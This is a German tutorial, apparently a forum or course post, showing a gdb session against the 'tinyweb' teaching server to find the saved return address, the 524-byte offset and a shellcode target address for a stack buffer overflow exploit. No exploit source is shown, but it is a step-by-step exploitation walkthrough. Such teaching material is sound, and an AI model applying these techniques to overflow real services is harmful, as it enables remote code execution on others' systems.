Tipp: `request` (Pufferanfang) ist der Anfang eures Spielraums und der saved eip (die gesicherte Rücksprungadresse) ist das Ende eures Spielraums – alles dazwischen dürft ihr überschreiben.


root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinyweb
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ps aux | grep tinyweb
root      2818  0.0  0.0   2048   284 tty2     S+   19:21   0:00 ./tinyweb
root      2824  0.0  0.0   5924   840 pts/1    S+   19:21   0:00 grep --color=auto tinyweb
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./tinyweb_exploit
Usage: ./tinyweb_exploit <hostname>
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q --pid=2818 --symbols=./tinyweb
Reading symbols from /home/tomovic/Dokumente/hack/tinyweb...done.
Attaching to process 2818
Load new symbol table from "/home/tomovic/Dokumente/hack/tinyweb"? (y or n) n
Nicht bestätigt.
(gdb) bt
#0  0xb7fdd424 in ?? ()
#1  0xb7e2f935 in ?? ()
(gdb) list
...Quellcode...
44       new_sockfd = accept(sockfd, (struct sockaddr *)&client_addr, &sin_size);
...Quellcode...
(gdb) break 62
Haltepunkt 1 at 0x8048d23: file tinyweb.c, line 62.
(gdb) c
Continuing.

Breakpoint 2, handle_connection (sockfd=4, client_addr_ptr=0xbffff6f4) at tinyweb.c:62
62    length = recv_line(sockfd, request);
(gdb) x/x request
0xbffff4c0: 0x00000007
(gdb) bt
#0  handle_connection (sockfd=4, client_addr_ptr=0xbffff6f4) at tinyweb.c:62
#1  0x08048d16 in main () at tinyweb.c:48

(gdb) x/x request
0xbffff4c0: 0x00000007

(gdb) x/16xw request+500
0xbffff6b4: 0xb7ff2990 0xb7fc5000 0xbffff728 0xb7fc5000
0xbffff6c4: 0x00000000 0xbffff728 0x08048d16 0x00000004
0xbffff6d4: 0xbffff6f4 0xbffff6f0 0xbffff714 0x00000004
0xbffff6e4: 0x08048840 0x00000000 0x08048631 0x00000010

 

Wenn ihr es genau wissen wollt: sucht im Speicherauszug nach dem Wert 0x08048d16 (laut `bt` die Rücksprungadresse in main(), tinyweb.c:48). Die Adresse, an der dieser Wert steht, ist die Position des saved eip auf dem Stack!!!

(gdb) x/30x request
0xbffff4c0: 0x00000007 0xb7fff000 0xb7e1979c 0x00000001
0xbffff4d0: 0xb7fdcb18 0xb7fe778c 0x00000001 0x00000001
0xbffff4e0: 0x00000000 0x00000011 0x00000088 0xb7ff3b53
0xbffff4f0: 0x00000008 0x00000003 0xb7fdcdc8 0xf15ae9b5
0xbffff500: 0x000003f3 0xb7ff7be6 0x078ad74d 0xb7e21768
0xbffff510: 0xb7e19eb8 0xb7fff55c 0xb7fde494 0xb7fdcb18
0xbffff520: 0xb7fde2d4 0xb7fde612 0xb7fde2d4 0x00000000
0xbffff530: 0x00000000 0x00000000
(gdb)
0xbffff538: 0x00000001 0x0000078b 0xb7fdcb48 0xb7fdc858
0xbffff548: 0x0804848a 0xb7e233d8 0x0804825c 0x00000001
0xbffff558: 0x00000000 0x00000040 0xb7fde714 0xb7fff000
0xbffff568: 0xbffff694 0xb7fffaf0 0xbffff650 0xb7fe79b2
0xbffff578: 0xbffff5f8 0x0804825c 0xbffff600 0xb7fffa94
0xbffff588: 0x00000000 0xb7fdcb48 0x00000001 0x00000000
0xbffff598: 0x00000001 0xb7fff938 0xb7fdcb18 0xb7fe778c
0xbffff5a8: 0x000fffff 0xb7fff000
(gdb)
0xbffff5b0: 0xb7fff55c 0xb7ff3186 0xb7fff000 0xb7fe1454
0xbffff5c0: 0xb7fff55c 0x00000003 0x00000000 0xf63d4e2e
0xbffff5d0: 0x000003f3 0x00000000 0xbffff694 0xb7fff938
0xbffff5e0: 0xb7e19eb8 0x00000000 0x00000000 0x00000000
0xbffff5f0: 0x0804848a 0x00000000 0xffffffff 0x00000000
0xbffff600: 0xb7e21768 0xb7fdc858 0x00000001 0x000008ce
0xbffff610: 0xb7fdcb48 0xb7fdc858 0x08048491 0xb7e233d8
0xbffff620: 0x080482ec 0x00000001
(gdb)
0xbffff628: 0xb7fff900 0x00000000 0x2cb43078 0xb7fff000
0xbffff638: 0xbffff764 0xb7fffaf0 0xbffff720 0xb7fff000
0xbffff648: 0xb7fff938 0x00000001 0x0804b02c 0xb7fec5ec
0xbffff658: 0xb7fffaf0 0xb7fdcb48 0x00000001 0x00000001
0xbffff668: 0x00000000 0xb7fff938 0x00000000 0x00000000
0xbffff678: 0x00000078 0x00000000 0x00000000 0x080483cc
0xbffff688: 0x00000000 0x30385000 0xbffff6de 0xb7e21768
0xbffff698: 0xb7e5a8f1 0xb7fc5000
(gdb)
0xbffff6a0: 0x00000000 0xb7fc5000 0x00000000 0x00000000
0xbffff6b0: 0xbffff728 0xb7ff2990 0xb7fc5000 0xbffff728
0xbffff6c0: 0xb7fc5000 0x00000000 0xbffff728 0x08048d16 <--- Rückspungadresse !!!
0xbffff6d0: 0x00000004 0xbffff6f4 0xbffff6f0 0xbffff714
0xbffff6e0: 0x00000004 0x08048840 0x00000000 0x08048631
0xbffff6f0: 0x00000010 0xe88e0002 0x0100007f 0x00000000
0xbffff700: 0x00000000 0x50000002 0x00000000 0x00000000
0xbffff710: 0x00000000 0x00000001

Die Gegenprobe (`info frame` bestätigt, wo der saved eip liegt):

(gdb) info frame
Stack level 0, frame at 0xbffff6d0:
 eip = 0x8048d23 in handle_connection (tinyweb.c:62); saved eip 0x8048d16 
 called by frame at 0xbffff730
 source language c.
 Arglist at 0xbffff6c8, args: sockfd=4, client_addr_ptr=0xbffff6f4
 Locals at 0xbffff6c8, Previous frame's sp is 0xbffff6d0
 Saved registers:
  ebx at 0xbffff6c0, ebp at 0xbffff6c8, edi at 0xbffff6c4, eip at 0xbffff6ccCouldn't read extended state status: Kein passendes Gerät gefunden.

(gdb) x/x request
0xbffff4c0: 0x00000007
(gdb) x/16xw request+480
0xbffff6a0: 0x00000000 0xb7fc5000 0x00000000 0x00000000
0xbffff6b0: 0xbffff728 0xb7ff2990 0xb7fc5000 0xbffff728
0xbffff6c0: 0xb7fc5000 0x00000000 0xbffff728 0x08048d16 <--- hier ist der eip !!!
0xbffff6d0: 0x00000004 0xbffff6f4 0xbffff6f0 0xbffff714

(gdb) x/x 0xbffff6cc ...der Test
0xbffff6cc: 0x08048d16 ...ok das ist der saved eip (Rücksprungadresse)
(gdb) p 0xbffff6cc - 0xbffff4c0   ...0xbffff6cc ist die Adresse des saved eip, 0xbffff4c0 die Adresse von request; die Differenz ist der Abstand in Bytes
$1 = 524
(gdb) p /x 0xbffff4c0 + 200  ...200 ist reserviert für den Shellcode
$2 = 0xbffff588
(gdb) quit
A debugging session is active.

 Inferior 1 [process 3088] will be detached.

Quit anyway? (y or n) y
Detaching from program: /home/tomovic/Dokumente/hack/tinyweb, process 3088
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#


Ganz wichtig :


$1 (= 524) ist der Offset: die Anzahl Bytes vom Anfang von `request` bis zum saved eip, also wie weit ihr schreiben müsst, um die Rücksprungadresse zu erreichen.
$2 (= 0xbffff588) ist die Zieladresse, mit der der saved eip überschrieben wird: `request + 200`, also eine Adresse innerhalb des Puffers, in dem euer Shellcode liegt.

öffnet die tinyweb_exploit.c und  tinyweb_exploit2.c, dann trägt ihr die Werte ein.
Denkt daran: die Werte gelten nur für genau diese Umgebung. Bei anderem OS, anderer Compiler-/Kernel-Version, anderem Environment oder aktivierter Stack-Randomisierung (ASLR) bekommt ihr andere Adressen und müsst die Messung wiederholen!!!
Die nächsten Beispiele sollten ohne Probleme gehen. Ich will euch nicht alles vorkauen :-) Tipps bekommt ihr per Email.

 


 

   
